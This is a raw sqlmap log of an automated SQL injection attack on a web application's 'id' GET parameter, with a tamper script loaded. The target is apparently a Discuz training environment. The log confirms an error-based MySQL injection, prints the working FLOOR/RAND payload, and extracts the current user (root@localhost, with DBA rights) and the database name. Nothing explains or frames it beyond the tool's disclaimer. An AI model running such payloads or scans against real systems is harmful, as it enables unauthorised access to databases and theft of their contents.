[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 10:41:22
[10:41:22] [INFO] loading tamper script 'aes' [10:41:22] [WARNING] provided value for parameter 'id' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly [10:41:22] [INFO] testing connection to the target URL [10:41:22] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS [10:41:22] [INFO] testing if the target URL content is stable [10:41:23] [INFO] target URL content is stable [10:41:23] [INFO] testing if GET parameter 'id' is dynamic [10:41:23] [INFO] confirming that GET parameter 'id' is dynamic [10:41:23] [INFO] GET parameter 'id' is dynamic [10:41:23] [WARNING] heuristic (basic) test shows that GET parameter 'id' might not be injectable [10:41:23] [INFO] testing for SQL injection on GET parameter 'id' [10:41:23] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' [10:41:24] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' [10:41:24] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' [10:41:24] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' [10:41:24] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)' [10:41:25] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' [10:41:25] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)' [10:41:25] [INFO] GET parameter 'id' is 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)' injectable it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] [10:41:27] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns' [10:41:27] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] sqlmap identified the following injection point(s) with a total of 64 HTTP(s) requests: --- Parameter: id (GET) Type: error-based Title: MySQL >= 5.0 error-based - Parameter replace (FLOOR) Payload: id=(SELECT 3997 FROM(SELECT COUNT(*),CONCAT(0x7170626271,(SELECT (ELT(3997=3997,1))),0x717a717171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) --- [10:41:28] [WARNING] changes made by tampering scripts are not included in shown payload content(s) [10:41:28] [INFO] the back-end DBMS is MySQL web server operating system: Linux Ubuntu web application technology: Nginx back-end DBMS: MySQL >= 5.0 [10:41:28] [INFO] fetching current user [10:41:28] [INFO] retrieved: root@localhost current user: 'root@localhost' [10:41:28] [INFO] fetching current database [10:41:29] [INFO] retrieved: mozhe_Discuz_StormGroup current database: 'mozhe_Discuz_StormGroup' [10:41:29] [INFO] testing if current user is DBA [10:41:29] [INFO] fetching current user current user is DBA: True